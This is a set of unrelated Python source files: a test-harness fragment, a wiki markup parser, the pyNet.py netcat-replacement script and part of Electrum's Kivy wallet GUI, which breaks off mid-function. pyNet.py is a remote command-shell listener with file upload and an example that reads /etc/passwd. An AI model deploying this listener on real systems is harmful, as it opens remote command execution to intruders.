stdout, stderr = [], []
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env, cwd=cwd)
stdoutStreamer = Thread(target = self.read_fd, args = (p, p.stdout, logger.debug, stdout))
stderrStreamer = Thread(target = self.read_fd, args = (p, p.stderr, logger.error, stderr))
stdoutStreamer.start()
stderrStreamer.start()
stdoutStreamer.join()
stderrStreamer.join()
# this is redundant, at this point threads were joined and they waited for the subprocess
# to exit, however it should not hurt to explicitly wait for it again (no-op).
p.wait()
stdout, stderr = "".join(stdout), "".join(stderr)
if p.returncode != 0:
if not ignore_errors:
raise RuntimeError("Error executing command {}".format(cmd))
else:
return stderr
return stdout
def ssh_sock_fn(self):
"""generate path to ssh socket
A socket path can't be over 107 chars on Linux, so generate a short
hash of the workspace and use that in $TMPDIR (usually /tmp) so we have
a predictable, test-unique, fixed-length path.
"""
path = os.path.join(
gettempdir(),
hashlib.md5(self.conf.workspace.encode()).hexdigest(),
"ssh-agent-sock"
)
maxl = 107
if len(path) > maxl:
raise Exception(f"Socket path '{path}' len {len(path)} > {maxl}")
return path
def read_fd(self, proc, fd, logger_func, output):
"""Read from fd, logging using logger_func
Read from fd, until proc is finished. All contents will
also be appended onto output."""
while True:
contents = fd.readline().decode()
if contents == '' and proc.poll() is not None:
return
if contents:
output.append(contents)
logger_func(contents.strip())
@timeout(60)
@step
def setup_ssh(self):
os.chmod(self.conf.ssh_key, 0o400)
# use a dedicated agent to minimize stateful components
sock_fn = self.ssh_sock_fn()
# be sure directory containing socket exists and socket doesn't exist
if os.path.exists(sock_fn):
try:
if os.path.isdir(sock_fn):
os.path.rmdir(sock_fn) # rmdir only removes an empty dir
else:
os.remove(sock_fn)
except FileNotFoundError:
pass
try:
os.mkdir(os.path.dirname(sock_fn), mode=0o700)
except FileExistsError:
if os.path.isdir(os.path.dirname(sock_fn)):
pass
else:
raise
# clean up old ssh agent process(es)
try:
self.runshellcommand("pkill -f 'ssh-agent -a {}'".format(sock_fn))
logger.warning("Killed previous instance of ssh-agent")
except:
pass
self.runshellcommand("ssh-agent -a {}".format(sock_fn))
self.runshellcommand(
"ssh-add " + self.conf.ssh_key, env={"SSH_AUTH_SOCK": sock_fn})
@timeout(30)
@step
def info(self):
"""Node info"""
info_lines = "Env vars: {}\n".format(sorted(os.environ))
info_lines += self.runshellcommand('ip a')
info_lines += self.runshellcommand('ip r')
info_lines += self.runshellcommand('cat /etc/resolv.conf')
# TODO: the logic for retrieving external is platform depedant and should be
# moved to the corresponding platform
try:
r = requests.get(
'http://169.254.169.254/2009-04-04/meta-data/public-ipv4', timeout=2)
r.raise_for_status()
except (requests.HTTPError, requests.Timeout) as err:
logger.warning(
f'Meta Data service unavailable could not get external IP addr{err}')
else:
info_lines += 'External IP addr: {}'.format(r.text)
return info_lines
|
mark.py | from .set_mark.namu import namu
from .set_mark.markdown import markdown
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
global conn
global curs
conn = data
curs = conn.cursor()
def send_parser(data):
if not re.search('^<br>$', data):
data = html.escape(data)
javascript = re.compile('javascript:', re.I)
data = javascript.sub('', data)
while 1:
re_data = re.search('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', data)
if re_data:
re_data = re_data.groups()[0]
data = re.sub('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', '<a href="/w/' + urllib.parse.quote(re_data).replace('/','%2F') + '">' + re_data + '</a>', data, 1)
else:
break
return data
def plusing(data):
for data_in in data:
curs.execute("select title from back where title = ? and link = ? and type = ?", [data_in[1], data_in[0], data_in[2]])
if not curs.fetchall():
curs.execute("insert into back (title, link, type) values (?, ?, ?)", [data_in[1], data_in[0], data_in[2]])
def namumark(title, data, num, include):
curs.execute('select data from other where name = "markup"')
rep_data = curs.fetchall()
if rep_data[0][0] == 'namumark':
data = namu(conn, data, title, num, include)
elif rep_data[0][0] == 'markdown':
data = markdown(conn, data, title, num)
elif rep_data[0][0] == 'raw':
data = [data, '', []]
else:
data = ['', '', []]
if num == 1:
data_num = len(data[2])
data_in_num = int(data_num / multiprocessing.cpu_count())
data_in = []
for i in range(multiprocessing.cpu_count()):
if i != multiprocessing.cpu_count() - 1:
data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
else:
data_in += [data[2][data_in_num * i:]]
for data_in_for in data_in:
thread_start = threading.Thread(target = plusing, args = [data_in_for])
thread_start.start()
thread_start.join()
conn.commit()
if num == 2:
return [data[0], data[1]]
else:
return data[0] + data[1] |
pyNet.py | #! ~/git/Code/scripts/
# Author : Garrett Lender
# Date : 2017 May 15
# Purpose : This script allows for the processing of comands on an external machine, listening on a port on a host machine for incoming connections,
# execution of a certain file once connection to a host machine is made, and can initialise a command shell.
import sys
import socket
import getopt
import threading
import subprocess
# globals
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
# this runs a command and returns the output
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
# this handles incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send("<PY NET :#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
# this is for incoming connections
def server_loop():
global target
global port
# if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
# if we don't listen we are a client....make it so.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target,port))
# if we detect input from stdin send it
# if not we are going to wait for the user to punch some in
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
# wait for more input
buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
# catch generic errors
print "[*] Exception! Exiting."
# teardown the connection
client.close()
def usage():
print "Netcat Replacement"
print
print "Usage: pyNet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print "Examples: "
print "pyNet.py -t 192.168.0.1 -p 7777 -l -c"
print "pyNet.py -t 192.168.0.1 -p 7777 -l -u=c:\\target.exe"
print "pyNet.py -t 192.168.0.1 -p 7777 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./pyNet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
# are we going to listen or just send data from stdin
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
